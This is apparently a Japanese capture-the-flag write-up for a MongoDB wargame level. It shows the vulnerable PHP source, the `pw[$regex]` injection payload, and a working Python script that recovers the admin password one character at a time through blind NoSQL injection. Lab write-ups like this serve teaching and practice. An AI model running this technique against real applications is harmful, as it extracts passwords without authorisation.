<?php include "./config.php"; login_chk(); $db = mongodb_connect(); $query = array( "id" => $_GET['id'], "pw" => $_GET['pw'] ); echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>"; $result = mongodb_fetch_array($db->prob_siren->find($query)); if($result['id']) echo "<h2>Hello User</h2>"; $query = array("id" => "admin"); $result = mongodb_fetch_array($db->prob_siren->find($query)); if($result['pw'] === $_GET['pw']) solve("siren"); highlight_file(__FILE__);
特徴は以下。
- MongoDB
- id,pwが入力可能
- adminのpwを特定する必要がある
Blind NoSQL Injection (for MongoDB)
Blind NoSQL Injectionをやる。
$regexを使う?id=admin&pw[$regex]=^abcとすると、{"id":"admin", "pw": {"$regex": "^abc"}}となり、pwを正規表現で取ってこれる- これをlike文のように使って抜き出す
import requests
url = "https://los.rubiya.kr/chall/siren_9.php"
cookie = {'PHPSESSID': 'fq5'}
def check(data) -> bool:
return ("Hello admin" in data) or ("Hello guest" in data) or ("<h2>Hello User</h2>" in data)
ans = ""
for i in range(0, 1010):
ok = False
for c in "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ,":
q = f"^{ans}{c}"
res = requests.get(url, params={'id': 'admin', 'pw[$regex]': q}, cookies=cookie)
if check(res.text):
ans += c
ok = True
break
if not ok:
break
print(f"[*] {ans}")
print(f"[*] find! {ans}")
